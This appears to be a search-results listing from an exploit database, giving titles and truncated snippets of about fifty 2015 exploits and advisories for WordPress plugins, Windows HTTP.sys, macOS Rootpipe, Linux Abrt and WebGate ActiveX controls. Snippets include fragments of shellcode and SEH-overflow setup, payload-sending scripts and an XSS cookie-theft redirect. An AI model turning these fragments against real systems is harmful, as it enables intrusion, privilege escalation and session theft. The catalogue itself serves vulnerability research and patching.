41207 matches found
Oracle - Outside-In .DOCX File Parsing Memory Corruption
Oracle - Outside-In .DOCX File Parsing Memory Corruption Title: Oracle Outside-In DOCX File Parsing Memory Corruption Platforms: Windows CVE: Secunia: PRL: 2015-04 Author: Francis Provencher Protek Research Lab’s Website: http://www.protekresearchlab.com/ Twitter: @ProtekResearch 1 Introduction 2...
Microsoft Windows - HTTP.sys HTTP Request Parsing Denial of Service (MS15-034)
Microsoft Windows - HTTP.sys HTTP Request Parsing Denial of Service MS15-034 Tested on Win Srv 2012R2. import socket,sys if lensys.argv=1: sys.exit'Give me an IP' Host = sys.argv1 def SendPayloadPayload, Host: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectHost, 80 s.sendPayload...
WordPress Plugin Ajax Store Locator 1.2 - SQL Injection
WordPress Plugin Ajax Store Locator 1.2 - SQL Injection Exploit Title : Wordpress Ajax Store Locator = 5.0.12 AND time-based blind SELECT' injectable for the remaining tests, do you want to include all tests for 'MySQ...
Microsoft Windows - HTTP.sys (PoC) (MS15-034)
Microsoft Windows - HTTP.sys PoC MS15-034 / UNTESTED - MS15-034 Checker THE BUG: 8a8b2112 56 push esi 8a8b2113 6a00 push 0 8a8b2115 2bc7 sub eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca sbb ecx,edx 8a8b211b 51 push ecx 8a8b211c 50 push eax 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd 8a868ae1 ; he...
WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (1)
WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download 1 Exploit Title :WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit Vendor :Miwisoft LLC Vendor Homepage :http://www.miwisoft.com Version :1.0.5 Tested on :Win7/Chrome/Firefox Exploit Author :Necmettin COSKUN...
Abrt (Fedora 21) - Race Condition
Abrt Fedora 21 - Race Condition include include include include include include include include include include include include include include include // // This is a race condition exploit for CVE-2015-1862, targeting Fedora. // // Note: It can take a few minutes to win the race condition. // /...
WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery Arbitrary File Deletion
WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery Arbitrary File Deletion WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart, fast and lightweight file...
WordPress Plugin Video Gallery 2.8 - SQL Injection
WordPress Plugin Video Gallery 2.8 - SQL Injection Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerabilitiey Exploit Author : Claudio Viviani Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery Software Link :...
ApportAbrt (Ubuntu Fedora) - Local Privilege Escalation
ApportAbrt Ubuntu Fedora - Local Privilege Escalation define GNUSOURCE include include include include include include include include include include include include include include warning this file must be compiled with -static // // Apport/Abrt Vulnerability Demo Exploit. // // Apport:...
WordPress Plugin MiwoFTP 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities
WordPress Plugin MiwoFTP 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart, fast and...
WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation Remote Code Execution
WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation Remote Code Execution WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit RCE Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart,...
Samsung iPOLiS - ReadConfigValue Remote Code Execution
Samsung iPOLiS - ReadConfigValue Remote Code Execution var shellcode =...
Mac-OSX-Privilege-Escalation
Apple Mac OS X contains a flaw in the Admin Framework that is triggered when checking XPC entitlements. This may allow a process to gain administrative privileges without properly authenticating...
Linux Kernel 3.133.14 (Ubuntu) - splice() System Call Local Denial of Service
Linux Kernel 3.133.14 Ubuntu - splice System Call Local Denial of Service / ---------------------------------------------------------------------------------------------------- cve-2014-7822poc.c The implementation of certain splicewrite file operations in the Linux kernel before 3.16 does not...
ProFTPd 1.3.5 - File Copy
ProFTPd 1.3.5 - File Copy Description TJ Saunders 2015-04-07 16:35:03 UTC Vadim Melihow reported a critical issue with proftpd installations that use the modcopy module's SITE CPFR/SITE CPTO commands; modcopy allows these commands to be used by unauthenticated clients:...
Traidnt Up 3.0 - SQL Injection
Traidnt Up 3.0 - SQL Injection Exploit Title: Traidnt Up v3.0 SQL Injection Google Dork: "Powered by TRAIDNT UP Version 3.0" Date: 10-04-2015 Exploit Author: Ali Sami [email protected] Vendor Homepage: http://traidnt.net Software Link:...
Apple Mac OSX 10.910 - Local Privilege Escalation
Apple Mac OSX 10.910 - Local Privilege Escalation / osx-irony-assist.m Copyright c 2010 by Apple MACOS X include import import / where you want to write it! / define BACKDOORBIN "/var/db/.AccessibilityAPIEnabled" int doassistivecopyconst char spath, const char dpath NSAutoreleasePool pool =...
WordPress Plugin WP Mobile Edition 2.7 - Remote File Disclosure
WordPress Plugin WP Mobile Edition 2.7 - Remote File Disclosure Exploit Title: Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability Date: April 11, 2015 Exploit Author: @LookHin Khwanchai Kaewyos Google Dork: inurl:?fdxswitcher=mobile Vendor Homepage:...
WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (1)
WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload 1 Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability Exploit Author : Claudio Viviani Software Link :...
Samba 3.6.2 (x86) - Denial of Service (PoC)
Samba 3.6.2 x86 - Denial of Service PoC !/usr/bin/python """ Exploit for Samba vulnerabilty CVE-2015-0240 by sleepya The exploit only targets vulnerable x86 smbd 3.6.24 which 'creds' is controlled by ReferentID field of PrimaryName ServerName. That means 'talloczero' in libtalloc does not write a...
WordPress Plugin Duplicator 0.5.14 - SQL Injection Cross-Site Request Forgery
WordPress Plugin Duplicator 0.5.14 - SQL Injection Cross-Site Request Forgery Exploit Title : Wordpress Duplicator prefix . 'duplicatorpackages'; $postIDs = isset$post'duplicatordelid' ? $post'duplicatordelid' : null; $list = explode",", $postIDs; $delCount = 0; if $postIDs != null foreach $list...
WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload
WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility Author : Manish Kishan Tanwar AKA error1046 Home Page :...
Barracuda Firmware 5.0.0.012 - (Authenticated) Remote Command Execution (Metasploit)
Barracuda Firmware 5.0.0.012 - Authenticated Remote Command Execution Metasploit Exploit Title: Barracuda Firmware 'Barracuda Firmware %q This module exploits a remote command execution vulnerability in the Barracuda Firmware Version 'xort', metasploit module , 'Version' = '$Revision: 12345 $',...
Apple Mac OSX 10.7.510.8.210.9.510.10.2 - Rootpipe Local Privilege Escalation
Apple Mac OSX 10.7.510.8.210.9.510.10.2 - Rootpipe Local Privilege Escalation PoC exploit code for rootpipe CVE-2015-1130 Created by Emil Kvarnhammar, TrueSec Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2 import os import sys import platform import re import ctypes import objc import sys from...
WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting
WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting Exploit Title: Shareaholic 7.6.0.3 XSS Date: 10-11-2014 Software Link: https://wordpress.org/plugins/shareaholic/ Exploit Author: Kacper Szurek Contact: http://twitter.com/KacperSzurek Website: http://security.szurek.pl/ CVE: CVE-2014-93...
Balero CMS 0.7.2 - Multiple Blind SQL Injections
Balero CMS 0.7.2 - Multiple Blind SQL Injections Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities Vendor: BaleroCMS Software Product web page: http://www.balerocms.com Affected version: 0.7.2 Summary: Balero CMS is an open source project that can help you manage the page of your...
WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection
WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection Google Dork: inurl:/plugins/trafficanalyzer/js/ Date: 4/7/2015 Exploit Author: Dan King @fuzztester Vendor Homepage: http://wptrafficanalyzer.in/ Software Link:...
Balero CMS 0.7.2 - Multiple JSHTML Injection Vulnerabilities
Balero CMS 0.7.2 - Multiple JSHTML Injection Vulnerabilities document.cookie="counter=1confirm'XSS'; path=/balerocms/"; csrf+stored xss+filter bypass+session hijack: document.location="http://www.zeroscience.mk/pent...
WordPress Plugin All In One WP Security Firewall 3.9.0 - SQL Injection
WordPress Plugin All In One WP Security Firewall 3.9.0 - SQL Injection Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability Exploit Author : Claudio Viviani Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ Software Link ...
Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution
Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution Remote code execution in Novell ZENworks Configuration Management 11.3.1 Discovered by Pedro Ribeiro [email protected], Agile Information Security ===============================================================================...
w3tw0rk-Pitbull-Perl-IRC
Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution Author: Jay Turla @shipcod3 Description: pitbull-w3tw0rkhunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution...
w3tw0rk Pitbull Perl IRC Bot - Remote Code Execution
w3tw0rk Pitbull Perl IRC Bot - Remote Code Execution thehunter.py Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution Author: Jay Turla @shipcod3 Description: pitbull-w3tw0rkhunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows...
u-Auctions - Multiple Vulnerabilities
u-Auctions - Multiple Vulnerabilities Exploit Title: u-Auctions Multiple Vulnerabilities Google Dork: "Powered by u-Auctions ©" Date: 03 April 2015 Exploit Author: Don Vendor Homepage: https://www.u-auctions.com / Version: ALL Tested on: Debian 1. Blind SQL injection: This vulnerability affects...
WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload
WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability Exploit Author : Claudio Viviani Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip Date : 2015-03-...
Airties-Air5650TT-Remote
Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Contact: [email protected] Twitter: @batuhanburakcin...
IDM-6.20-Local-Buffer
Author: TUNISIAN CYBER + Exploit Title: IDM v6.20 Local Buffer Overflow + Date: 27-03-2015 + Type: Local Exploits + Tested on: WinXp/Windows 7 Pro + Vendor: https://www.internetdownloadmanager.com/ + Friendly Sites: sec4ever.com...
WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload
WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload Title: Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17 Author: Larry W. Cashdollar, @larry0 Date: 2015-03-29 Download Site:...
phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection
phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection | | / | \ | |/ |/ | / | | | | | | | | | | | | | / \ | | | || || | |\ | || | | / | | |/|| ||// \| phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection 0-day Website : http://codecanyon.net/item/phpsfp-schedule-facebook-posts/5177393...
WordPress Plugin Business Intelligence - SQL Injection (Metasploit)
WordPress Plugin Business Intelligence - SQL Injection Metasploit Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability Author : Jagriti Sahu AKA Incredible Vendor Link : https://www.wpbusinessintelligence.com Download Link :...
Multiple WordPress UpThemes Themes - Arbitrary File Upload
Multiple WordPress UpThemes Themes - Arbitrary File Upload Exploit Title: Wordpress SimpleCart Theme File Upload and Execution Google Dork: inurl:/wp-content/themes/simplecart Date: 31 March 2015 Exploit Author: Divya Vendor Homepage: https://github.com/UpThemes/ Software Link:...
WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow
WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i128; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...
WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow
WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow var arg1="PraveenD"; var arg2=1; var arg3= ""; var arg4="PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i1664; i++ arg3 += "B"; var nseh = "\xeb\x10PD"; //WESPSerialPort.dll0x100104e7 = pop pop ret var seh =...
WebGate WESP SDK 1.2 - ChangePassword Stack Overflow
WebGate WESP SDK 1.2 - ChangePassword Stack Overflow var arg1 = ""; var arg2 = "PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i248; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; //WESPConfig.dll0x10022f35 = pop pop pop ret var seh = "\x3d\x2f\x02\x10"; for i=0;i80; i++ nops +...
Kemp Load Master 7.1.16 - Multiple Vulnerabilities
Kemp Load Master 7.1.16 - Multiple Vulnerabilities Exploit Title: Kemp Load Master - Multiple Vulnerabilities RCE, CSRF, XSS, DoS Date: 01 April 2015 Author: Roberto Suggi Liverani Software Link: http://kemptechnologies.com/load-balancer/ Version: 7.1.16 and previous versions Tested on: Kemp Load...
WordPress Plugin Simple Ads Manager - Multiple SQL Injections
WordPress Plugin Simple Ads Manager - Multiple SQL Injections Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection Product: Wordpress plugin Simple Ads Manager Vendor: https://profiles.wordpress.org/minimus/ Affected version: Simple Ads Manager 2.5.94 and 2.5.96 Download link:...
WordPress Plugin Video Gallery 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities
WordPress Plugin Video Gallery 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities Exploit Title: Wordpress Video Gallery Plugin Multiple CSRF File Upload Google Dork: inurl:/wp-content/plugins/contus-video-gallery Date: 31 March 2015 Exploit Author: Divya Vendor Homepage:...
WordPress Plugin WP Easy Slideshow 1.0.3 - Multiple Vulnerabilities
WordPress Plugin WP Easy Slideshow 1.0.3 - Multiple Vulnerabilities Exploit Title: Wordpress WP Easy Slideshow Plugin Multiple Vulnerabilities Google Dork: inurl:/wp-content/uploads/wp-easy-slideshow/ Date: 2 April 2015 Exploit Author: Divya Vendor Homepage:...
Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal
Ericsson Drutt MSDP Instance Monitor - Directory Traversal +------------------------------------------------------------------------------------------------------+ + Ericsson Drutt MSDP Instance Monitor - Directory Traversal Vulnerability and Arbitrary File Access +...
WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow
WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i128; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...
WordPress Plugin Simple Ads Manager - Information Disclosure
WordPress Plugin Simple Ads Manager - Information Disclosure Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure Product: Wordpress plugin Simple Ads Manager Vendor: https://profiles.wordpress.org/minimus/ Affected version: Simple Ads Manager 2.5.94 and 2.5.96 Downlo...